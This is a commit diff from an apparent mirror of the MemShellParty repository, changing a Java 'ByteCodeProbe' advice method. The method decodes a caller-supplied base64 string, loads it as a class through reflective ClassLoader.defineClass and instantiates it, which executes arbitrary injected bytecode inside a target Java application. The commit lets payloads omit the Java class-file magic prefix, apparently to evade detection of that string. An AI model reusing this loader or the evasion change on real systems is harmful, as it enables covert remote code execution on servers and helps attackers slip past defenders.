mirror of
https://github.com/ReaJason/MemShellParty.git
synced 2026-09-21 22:50:42 +08:00
feat: byteCode Probe support remove magic str
This commit is contained in:
@@ -23,20 +23,22 @@ public class ByteCodeProbe {
|
|||||||
public static String exit(@Advice.Argument(0) String data, @Advice.Return(readOnly = false) String ret) throws Throwable {
|
public static String exit(@Advice.Argument(0) String data, @Advice.Return(readOnly = false) String ret) throws Throwable {
|
||||||
Class<?> decoderClass;
|
Class<?> decoderClass;
|
||||||
byte[] classBytes;
|
byte[] classBytes;
|
||||||
|
String base64 = data;
|
||||||
|
if (!data.startsWith("yv66vgAAAD")) {
|
||||||
|
base64 = "yv66vgAAAD" + data;
|
||||||
|
}
|
||||||
try {
|
try {
|
||||||
decoderClass = Class.forName("java.util.Base64");
|
decoderClass = Class.forName("java.util.Base64");
|
||||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||||
classBytes = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, data);
|
classBytes = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64);
|
||||||
} catch (Exception ignored) {
|
} catch (Exception ignored) {
|
||||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||||
classBytes = (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), data);
|
classBytes = (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64);
|
||||||
}
|
}
|
||||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||||
defineClass.setAccessible(true);
|
defineClass.setAccessible(true);
|
||||||
Class<?> clazz = (Class<?>) defineClass.invoke(new URLClassLoader(new URL[]{}), classBytes, 0, classBytes.length);
|
Class<?> clazz = (Class<?>) defineClass.invoke(new java.net.URLClassLoader(new java.net.URL[]{}), classBytes, 0, classBytes.length);
|
||||||
ret = clazz.newInstance().toString();
|
return ret = clazz.newInstance().toString();
|
||||||
System.out.println(ret);
|
|
||||||
return ret;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
@Override
|
@Override
|
||||||
|
|||||||
Reference in New Issue
Block a user